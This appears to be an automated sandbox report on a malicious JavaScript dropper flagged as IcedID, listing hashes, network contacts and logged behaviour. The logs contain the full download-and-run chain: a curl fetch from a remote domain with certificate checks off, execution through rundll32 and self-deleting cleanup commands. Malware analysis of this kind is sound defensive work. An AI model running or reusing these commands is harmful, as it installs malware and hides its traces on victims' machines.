Summary | ZeroBOX

Document_Scan_463.js

UPX OS Processor Check PE64 PE File DLL
Category Machine Started Completed
FILE s1_win7_x6403_us Aug. 31, 2023, 10:40 a.m. Aug. 31, 2023, 10:42 a.m.
Size 32.5KB
Type ASCII text
MD5 ff68487fd840687d90c92d63ea6ef82a
SHA256 003b90e0e529c7e2955c561e28636c950292d53842487061597702f013e80627
CRC32 09BEF310
ssdeep 384:9DNfsx1w2P83puhxHRkMid2OoW3VaT0bDtDEWU/kO2aZ+91tEkQ2mHKoywGCDRnO:hNiZ6z8sYY+P/fjkSTZMB
Yara None matched

IP Address Status Action
164.124.101.2 Active Moloch
172.67.179.217 Active Moloch
184.168.117.217 Active Moloch

Suricata Alerts

Flow SID Signature Category
TCP 192.168.56.103:49175 -> 172.67.179.217:80 2032086 ET MALWARE Win32/IcedID Request Cookie A Network Trojan was detected

Suricata TLS

Flow Issuer Subject Fingerprint
TLS 1.2
192.168.56.103:49169
184.168.117.217:443
C=US, ST=TX, L=Houston, O=cPanel, Inc., CN=cPanel, Inc. Certification Authority CN=moashraya.com f5:4f:f0:43:5d:87:29:b9:67:28:34:e9:f9:c2:a3:5d:38:79:d1:55

Time & API Arguments Status Return Repeated

IsDebuggerPresent

0 0
Time & API Arguments Status Return Repeated

WriteConsoleW

buffer: C:\Users\test22\AppData\Local\Temp>
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: curl
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: https://moashraya.com/out/t.php --output "C:\Users\test22\AppData\Local\Temp\expedita.gdolorum.d" --ssl-no-revoke --insecure --location
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: C:\Users\test22\AppData\Local\Temp\expedita.g.bat
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: The process cannot access the file because it is being used by another process.
console_handle: 0x0000000b
1 1 0
Time & API Arguments Status Return Repeated

bind

ip_address: 127.0.0.1
socket: 144
port: 0
1 0 0

listen

socket: 144
backlog: 1
1 0 0

accept

ip_address:
socket: 144
port: 0
1 152 0
suspicious_features GET method with no useragent header suspicious_request GET http://oopscokir.com/
request GET http://oopscokir.com/
file C:\Users\test22\AppData\Local\Temp\expedita.g.bat
cmdline cmd.exe /c echo curl https://moashraya.com/out/t.php --output "C:\Users\test22\AppData\Local\Temp\expedita.gdolorum.d" --ssl-no-revoke --insecure --location > "C:\Users\test22\AppData\Local\Temp\expedita.g.bat"
cmdline "C:\Windows\System32\cmd.exe" /c "C:\Users\test22\AppData\Local\Temp\expedita.g.bat"
cmdline cmd.exe /c del "C:\Users\test22\AppData\Local\Temp\expedita.g.bat"
cmdline cmd.exe /c "C:\Users\test22\AppData\Local\Temp\expedita.g.bat"
cmdline cmd.exe /c del "C:\Users\test22\AppData\Local\Temp\Document_Scan_463.js"
cmdline cmd.exe /c ren "C:\Users\test22\AppData\Local\Temp\expedita.gdolorum.d" "expedita.g"
cmdline "C:\Windows\System32\cmd.exe" /c ren "C:\Users\test22\AppData\Local\Temp\expedita.gdolorum.d" "expedita.g"
cmdline "C:\Windows\System32\cmd.exe" /c del "C:\Users\test22\AppData\Local\Temp\Document_Scan_463.js"
cmdline "C:\Windows\System32\cmd.exe" /c del "C:\Users\test22\AppData\Local\Temp\expedita.g.bat"
cmdline "C:\Windows\System32\cmd.exe" /c echo curl https://moashraya.com/out/t.php --output "C:\Users\test22\AppData\Local\Temp\expedita.gdolorum.d" --ssl-no-revoke --insecure --location > "C:\Users\test22\AppData\Local\Temp\expedita.g.bat"
Time & API Arguments Status Return Repeated

ShellExecuteExW

show_type: 0
filepath_r: cmd.exe
parameters: /c del "C:\Users\test22\AppData\Local\Temp\Document_Scan_463.js"
filepath: cmd.exe
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: cmd.exe
parameters: /c echo curl https://moashraya.com/out/t.php --output "C:\Users\test22\AppData\Local\Temp\expedita.gdolorum.d" --ssl-no-revoke --insecure --location > "C:\Users\test22\AppData\Local\Temp\expedita.g.bat"
filepath: cmd.exe
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: cmd.exe
parameters: /c "C:\Users\test22\AppData\Local\Temp\expedita.g.bat"
filepath: cmd.exe
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: cmd.exe
parameters: /c ren "C:\Users\test22\AppData\Local\Temp\expedita.gdolorum.d" "expedita.g"
filepath: cmd.exe
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: rundll32
parameters: "C:\Users\test22\AppData\Local\Temp\expedita.g", scab /k arabika752
filepath: rundll32
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: cmd.exe
parameters: /c del "C:\Users\test22\AppData\Local\Temp\expedita.g.bat"
filepath: cmd.exe
1 1 0
Time & API Arguments Status Return Repeated

NtProtectVirtualMemory

process_identifier: 2640
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 16384
protection: 32 (PAGE_EXECUTE_READ)
base_address: 0x00000000002d0000
process_handle: 0xffffffffffffffff
1 0 0
cmdline cmd.exe /c del "C:\Users\test22\AppData\Local\Temp\expedita.g.bat"
cmdline cmd.exe /c del "C:\Users\test22\AppData\Local\Temp\Document_Scan_463.js"
cmdline "C:\Windows\System32\cmd.exe" /c del "C:\Users\test22\AppData\Local\Temp\Document_Scan_463.js"
cmdline "C:\Windows\System32\cmd.exe" /c del "C:\Users\test22\AppData\Local\Temp\expedita.g.bat"
parent_process wscript.exe martian_process cmd.exe /c del "C:\Users\test22\AppData\Local\Temp\Document_Scan_463.js"
parent_process wscript.exe martian_process "C:\Windows\System32\cmd.exe" /c "C:\Users\test22\AppData\Local\Temp\expedita.g.bat"
parent_process wscript.exe martian_process cmd.exe /c del "C:\Users\test22\AppData\Local\Temp\expedita.g.bat"
parent_process wscript.exe martian_process cmd.exe /c "C:\Users\test22\AppData\Local\Temp\expedita.g.bat"
parent_process wscript.exe martian_process cmd.exe /c echo curl https://moashraya.com/out/t.php --output "C:\Users\test22\AppData\Local\Temp\expedita.gdolorum.d" --ssl-no-revoke --insecure --location > "C:\Users\test22\AppData\Local\Temp\expedita.g.bat"
parent_process wscript.exe martian_process rundll32 "C:\Users\test22\AppData\Local\Temp\expedita.g", scab /k arabika752
parent_process wscript.exe martian_process cmd.exe /c ren "C:\Users\test22\AppData\Local\Temp\expedita.gdolorum.d" "expedita.g"
parent_process wscript.exe martian_process "C:\Windows\System32\cmd.exe" /c ren "C:\Users\test22\AppData\Local\Temp\expedita.gdolorum.d" "expedita.g"
parent_process wscript.exe martian_process "C:\Windows\System32\cmd.exe" /c del "C:\Users\test22\AppData\Local\Temp\Document_Scan_463.js"
parent_process wscript.exe martian_process "C:\Windows\System32\cmd.exe" /c del "C:\Users\test22\AppData\Local\Temp\expedita.g.bat"
parent_process wscript.exe martian_process "C:\Windows\System32\cmd.exe" /c echo curl https://moashraya.com/out/t.php --output "C:\Users\test22\AppData\Local\Temp\expedita.gdolorum.d" --ssl-no-revoke --insecure --location > "C:\Users\test22\AppData\Local\Temp\expedita.g.bat"
parent_process wscript.exe martian_process "C:\Windows\System32\rundll32.exe" "C:\Users\test22\AppData\Local\Temp\expedita.g", scab /k arabika752
file C:\Windows\System32\cmd.exe
file C:\Windows\System32\rundll32.exe